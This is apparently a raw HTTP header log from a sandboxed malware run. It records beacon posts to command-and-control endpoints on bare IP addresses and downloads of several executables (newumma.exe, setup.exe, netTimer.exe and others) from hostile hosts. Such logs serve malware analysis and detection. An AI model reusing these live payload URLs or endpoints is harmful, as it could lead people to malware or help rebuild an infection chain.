HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:28 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 25 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:28 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 3 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /geoip/v2.1/city/me HTTP/1.1 Connection: Keep-Alive Referer: https://www.maxmind.com/en/locate-my-ip-address User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: www.maxmind.com

HTTP/1.1 403 Forbidden Date: Fri, 27 Oct 2023 03:15:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4520 Connection: keep-alive X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: max-age=15 Expires: Fri, 27 Oct 2023 03:15:44 GMT Server: cloudflare CF-RAY: 81c7c6604a9ec07b-ICN

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 13 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:30 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 15 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firecom.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 69 Host: 193.42.32.118

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:30 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1g PHP/7.2.33 X-Powered-By: PHP/7.2.33 Content-Length: 42 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /download/WWW14_64.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:31 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:22 GMT ETag: "677c00-6067cccd916ee" Accept-Ranges: bytes Content-Length: 6781952 Content-Type: application/x-msdos-program

GET /download/WWW14_64.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.226 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:32 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Fri, 29 Sep 2023 10:22:22 GMT ETag: "677c00-6067cccd916ee" Accept-Ranges: bytes Content-Length: 6781952 Content-Type: application/x-msdos-program

POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=cpn25Faw7cLJgmi5ZdqO Content-Length: 213 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: 193.233.255.73 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Oct 2023 03:15:33 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:33 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 512 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /newumma.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 185.172.128.69 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Oct 2023 03:15:34 GMT Content-Type: application/octet-stream Content-Length: 10352640 Last-Modified: Thu, 26 Oct 2023 07:39:08 GMT Connection: keep-alive ETag: "653a179c-9df800" Accept-Ranges: bytes

GET /newumma.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 185.172.128.69 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Oct 2023 03:15:35 GMT Content-Type: application/octet-stream Content-Length: 10352640 Last-Modified: Thu, 26 Oct 2023 07:39:08 GMT Connection: keep-alive ETag: "653a179c-9df800" Accept-Ranges: bytes

POST /loghub/master HTTP/1.1 Content-Type: multipart/form-data; boundary=F7uuO9s7nLi7RbDkNgEA Content-Length: 213 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1) Host: 193.233.255.73 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Oct 2023 03:15:42 GMT Content-Type: text/html; charset=utf-8 Content-Length: 8 Connection: keep-alive X-Frame-Options: DENY X-Content-Type-Options: nosniff Referrer-Policy: same-origin

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:42 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.124.1 Content-Length: 90 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 389 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:44 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:45 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 94.142.138.131

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:52 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 2048 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 261 Host: 45.15.156.229

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:52 GMT Server: Apache/2.4.29 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /files/Ads.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.221 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:52 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Fri, 27 Oct 2023 01:25:28 GMT ETag: "11fce0-608a890476dc9" Accept-Ranges: bytes Content-Length: 1178848 Content-Type: application/x-msdownload

HEAD /3.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.213 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:53 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Wed, 25 Oct 2023 09:36:37 GMT ETag: "f05601-608873118bf79" Accept-Ranges: bytes Content-Length: 15750657 Content-Type: application/x-msdos-program

HEAD /setup.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 194.169.175.233 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:53 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Thu, 26 Oct 2023 18:02:08 GMT ETag: "729693-608a25ecf72d3" Accept-Ranges: bytes Content-Length: 7509651 Content-Type: application/x-msdos-program

GET /3.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.213 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:53 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Wed, 25 Oct 2023 09:36:37 GMT ETag: "f05601-608873118bf79" Accept-Ranges: bytes Content-Length: 15750657 Content-Type: application/x-msdos-program

GET /files/Ads.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 171.22.28.221 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:52 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28 Last-Modified: Fri, 27 Oct 2023 01:25:28 GMT ETag: "11fce0-608a890476dc9" Accept-Ranges: bytes Content-Length: 1178848 Content-Type: application/x-msdownload

GET /setup.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 194.169.175.233 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:53 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Thu, 26 Oct 2023 18:02:08 GMT ETag: "729693-608a25ecf72d3" Accept-Ranges: bytes Content-Length: 7509651 Content-Type: application/x-msdos-program

HEAD /netTimer.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: lakuiksong.known.co.ke Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:54 GMT Server: Apache Last-Modified: Mon, 23 Oct 2023 16:51:19 GMT Accept-Ranges: bytes Content-Length: 3241472 Content-Type: application/x-msdownload

GET /netTimer.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: lakuiksong.known.co.ke Cache-Control: no-cache

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:15:55 GMT Server: Apache Last-Modified: Mon, 23 Oct 2023 16:51:19 GMT Accept-Ranges: bytes Content-Length: 3241472 Content-Type: application/x-msdownload

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 27 Oct 2023 04:15:55 GMT Date: Fri, 27 Oct 2023 03:15:55 GMT Connection: keep-alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-Robots-Tag: noindex Referrer-Policy: same-origin Last-Modified: Fri, 13 Oct 2023 16:28:31 GMT ETag: "37d-6079b8c0929c0" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Fri, 27 Oct 2023 04:15:57 GMT Date: Fri, 27 Oct 2023 03:15:57 GMT Connection: keep-alive

GET /test2/get.php?pid=CD20CF071BA7C05D5F5E6CAF42496E78&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zexeq.com

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:16:00 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 558 Connection: close Content-Type: text/html; charset=UTF-8

GET /fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=rHs0an9bdrTIaDtaE0Df9rlg.exe&platform=0009&osver=5&isServer=0 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: go.microsoft.com Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily Content-Length: 0 Server: Kestrel Location: https://learn.microsoft.com/dotnet/framework/install/application-not-started?version=(null)&processName=rHs0an9bdrTIaDtaE0Df9rlg.exe&platform=0009&osver=5&isServer=0 Request-Context: appId=cid-v1:7d63747b-487e-492a-872d-762362f77974 X-Response-Cache-Status: True Expires: Fri, 27 Oct 2023 03:16:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 27 Oct 2023 03:16:02 GMT Connection: keep-alive

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:16:11 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-PQnnn51kPfXVMbc_Dx8N4g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2318 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-27-03; expires=Sun, 26-Nov-2023 03:16:11 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1Rg41prOCw2UmOpEiX8k1MTD8mbN075r_Z8wuc505rv479kZ0iTKXA; expires=Wed, 24-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=hHqNdK7suybe9kBYhAv8BR67-yFo0LSAjs_mPHY8XtwD9rQkFJPOg3wj1ePs3XCdHUNRe_ZcdnG0cv5LjwqeOi-NovfTgJ9hdJ506zwkMEtHaFnSARsx3ftCBBbp2jvDjFReV7CLWSO59e_xV4QkroRuubtf6ATOXx66IxH68us; expires=Sat, 27-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:16:11 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-i1v2GmrkiboEkH7uGD8GMQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2315 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-27-03; expires=Sun, 26-Nov-2023 03:16:11 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1Qo-T9fMEIMLVo_M04QB96wUy27Gii_PGOsz8zGwi-EgkdLl8-OZA; expires=Wed, 24-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=seS-zJfbzwNsRz9sg04p7-Z9rL3Hk_jrQp1KbuRROYhFqi-eQBBFDc78D1SPIkJVahDmg-oZBt7ms1b9ZOBYYhqKhJf1Y3bPNW2I_-lwqAmgK8n59AB3hxbs2BodIaZkNkTkrXFBHp-g4htysDMJSXMU3twjI0_GSZxvbm16d1U; expires=Sat, 27-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:16:11 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-SXkd9o-8SjpxNugj3YXvKQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2316 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-27-03; expires=Sun, 26-Nov-2023 03:16:11 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1SuZrCmWusB_BiQZ1TwJiK_wT6IynMqIB2jDC0Np0yPLJgF1AE8XQk; expires=Wed, 24-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=aQspTbbErG7HVwYEQVw9z44YGwlL8qqCJC_wgXg-kkSCb45Xh5lScOP3wxEqSYr2-WJmXiyYVgpD6ojYtry2lq5iwiXYBkNH1us_g4CvfssKyTE2plR3rQPTzksLVnl7aUVRVOXAnWnrnzgLDvM5Ro1_WBxbHo3jpXDZXIMotnQ; expires=Sat, 27-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:16:11 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-IxDDVNDNiRxqNqp21Exd0A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2320 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-27-03; expires=Sun, 26-Nov-2023 03:16:11 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1SqzMe843bORLuxuF_l0Vxjf4d18pM0B0CVVmUVLaKFhZOUTC8mASA; expires=Wed, 24-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=CfD9Btg14d4kUKrtX2ezcBZInf8ih138VK-AZjyjcqAM_RZDHFYtkRUyz8PuQF_NYyNriZxDoHdMzPtcvRMTSQYcz_-kf7J-KWxYSXdVz79pQdlDLflgdYfh0OG19W8h3y66LW4Fr1bCuK7aKp4c9mHlqwmhRoNAuU5TiFjNujk; expires=Sat, 27-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:16:11 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-Ht8rEg4uAN_KuJI1vlOrGQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2318 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-27-03; expires=Sun, 26-Nov-2023 03:16:11 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1SkKdFCMOBSvXOWdtsk7PwVoz6CnXWOe0Y4ZhkM3xcygwJCjpxezg; expires=Wed, 24-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=vmNBxF82sZXHoQHN-rpni6Vq9HkAEGxuPIhsBHfcM8mQC1N9zmpuBMtBhFJMUFP9lZx5trNV-K9pDjZuWI_rPJ1vpejnsuLisgPNuaW7FFjtE3_zfpWbil64V4D6_hQfWqYzIbTH1E_X3jJ3RexsyFaJxb34fGqq59h6zV2anMg; expires=Sat, 27-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:16:11 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-qfKAsryjdr6KC-y712s7pQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2315 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-27-03; expires=Sun, 26-Nov-2023 03:16:11 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1Qvl865YexorzyhDDnS85PARYQwfe5b_cXoG-Xgs23tQSp7Y6rKOw; expires=Wed, 24-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=miqZ57QKT0vWznumj4byGKOC5-6d5U_XH5T3noKI5jy35a53YuTDlDLv56k9RaGrpPp8s1tbIFOiVh4uEET5jt9UeDzpgWEFZPN5skQDzPo_5NHgsrdQZ9ki2X71EBKrwbLVdF-1jRBxkoTHAY-jYI2NH6OK_B_KJvAQS19IrZI; expires=Sat, 27-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; HttpOnly

GET / HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */* Accept-Language: en Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; EmbeddedWB 14,52 from: http://www.bsalsa.com/ EmbeddedWB 14,52; .NET CLR 2.0.50727) Host: www.google.com Connection: Keep-Alive

HTTP/1.1 200 OK Date: Fri, 27 Oct 2023 03:16:11 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-R5VaxVOrSYEXtAEpPy0YSw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Encoding: gzip Server: gws Content-Length: 2312 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2023-10-27-03; expires=Sun, 26-Nov-2023 03:16:11 GMT; path=/; domain=.google.com; Secure Set-Cookie: AEC=Ackid1SJWD7pBLcjHkxRcNvdcvZHo0fg9FhLvpe7bWLV8exVcHdtTmqtXw; expires=Wed, 24-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax Set-Cookie: NID=511=YSZJSGIn8Di_WGiQQGl-Xt2IylyXbAG_Ulw3VNJRxf6Pvdb40I7N2wPCMV9xXaDgCJHXnUoPSQuxEdWOCFnsastwej6vQAnJWUs-knd0pVpy5DJ-awAWxDRDvKunt9fs5aUEcQYpV0bUpafM1jDocOTXMV62q80zt7DnoHLsSUM; expires=Sat, 27-Apr-2024 03:16:11 GMT; path=/; domain=.google.com; HttpOnly